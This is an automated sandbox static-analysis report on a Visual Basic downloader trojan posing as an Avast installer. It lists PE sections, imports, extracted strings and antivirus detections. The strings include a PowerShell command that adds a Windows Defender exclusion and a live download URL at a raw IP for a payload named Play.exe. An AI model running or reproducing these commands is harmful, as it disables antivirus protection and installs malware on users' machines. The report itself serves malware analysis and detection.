Static | ZeroBOX

PE Compile Time

2023-06-12 21:51:19

PE Imphash

769adc189c80de1183a16ee3ab5f134a

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00000ef8 0x00001000 4.80656848779
.data 0x00002000 0x000002cc 0x00001000 0.0
.rsrc 0x00003000 0x000009b0 0x00001000 2.14411831316

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00003560 0x00000128 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00003560 0x00000128 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00003560 0x00000128 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_GROUP_ICON 0x00003688 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x000036b8 0x000002f8 LANG_ENGLISH SUBLANG_ENGLISH_US data

Imports

Library MSVBVM60.DLL:
0x401000 _CIcos
0x401004 _adj_fptan
0x401008 __vbaFreeVar
0x40100c _adj_fdiv_m64
0x401010 _adj_fprem1
0x401014 _adj_fdiv_m32
0x401018 __vbaLateMemSt
0x40101c _adj_fdiv_m16i
0x401020 __vbaObjSetAddref
0x401024 _adj_fdivr_m16i
0x401028 _CIsin
0x40102c __vbaChkstk
0x401030 __vbaObjVar
0x401034 _adj_fpatan
0x401038 None
0x40103c _CIsqrt
0x401040 __vbaExceptHandler
0x401044 _adj_fprem
0x401048 _adj_fdivr_m64
0x40104c None
0x401050 __vbaFPException
0x401054 _CIlog
0x401058 _adj_fdiv_m32i
0x40105c _adj_fdivr_m32i
0x401060 __vbaStrCopy
0x401064 _adj_fdivr_m32
0x401068 _adj_fdiv_r
0x40106c None
0x401070 __vbaLateMemCall
0x401074 __vbaVarDup
0x401078 __vbaLateMemCallLd
0x40107c _CIatan
0x401080 _allmul
0x401084 _CItan
0x401088 _CIexp
0x40108c __vbaFreeObj
0x401090 __vbaFreeStr

Strings

!This program cannot be run in DOS mode.
`.data
MSVBVM60.DLL
Project1
Project1
Project1
Module1
Project1
VBA6.DLL
@*\AC:\Users\ivan_\Desktop\run file remote\Project1.vbp
WScript.Shell
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public"
http://51.79.49.73/crc/Play.exe
C:\Users\Public\Videos\Play.exe
MSXML2.XMLHTTP
ADODB.Stream
responseBody
SaveToFile
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
AVAST Software
Edition
FileDescription
Avast Installer
FileVersion
2.1.99.0
InternalName
microstub
LegalCopyright
Copyright (c) 2023 AVAST Software
OriginalFilename
microstub.exe
ProductName
ProductVersion
2.1.99.0
VarFileInfo
Translation

Antivirus Signature

Bkav Clean
Lionic Clean
tehtris Clean
DrWeb Trojan.DownLoader45.58454
MicroWorld-eScan Gen:Variant.Tedy.380556
FireEye Gen:Variant.Tedy.380556
CAT-QuickHeal Clean
McAfee RDN/Generic PWS.y
Malwarebytes RiskWare.Agent.VB
VIPRE Gen:Variant.Tedy.380556
Sangfor Clean
K7AntiVirus Clean
BitDefender Gen:Variant.Tedy.380556
K7GW Clean
Cybereason malicious.8b13e6
BitDefenderTheta Clean
VirIT Clean
Cyren W32/ABRisk.KZBF-6204
Symantec Trojan Horse
Elastic Clean
ESET-NOD32 Clean
APEX Clean
Paloalto Clean
ClamAV Clean
Kaspersky Trojan-Spy.Win32.Stealer.dypr
Alibaba Trojan:Application/Generic.da7d6155
NANO-Antivirus Clean
ViRobot Clean
Emsisoft Gen:Variant.Tedy.380556 (B)
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Artemis!Trojan
Trapmine malicious.moderate.ml.score
CMC Clean
Sophos Mal/Generic-S
Ikarus Clean
GData Win32.Trojan-Downloader.Generic.KSOA9V
Jiangmin Clean
Webroot W32.Trojan.Gen
Google Detected
Avira Clean
MAX malware (ai score=84)
Antiy-AVL Trojan[Spy]/Win32.Stealer
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Tedy.D5CE8C
SUPERAntiSpyware Clean
ZoneAlarm Trojan-Spy.Win32.Stealer.dypr
Microsoft Trojan:Win32/Wacatac.B!ml
Cynet Clean
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
ALYac Gen:Variant.Tedy.380556
TACHYON Clean
DeepInstinct MALICIOUS
Cylance Clean
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002H09FC23
Rising Stealer.Agent!8.C2 (CLOUD)
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet W32/PossibleThreat
AVG Win32:RATX-gen [Trj]
Avast Win32:RATX-gen [Trj]
CrowdStrike win/malicious_confidence_60% (W)
No IRMA results available.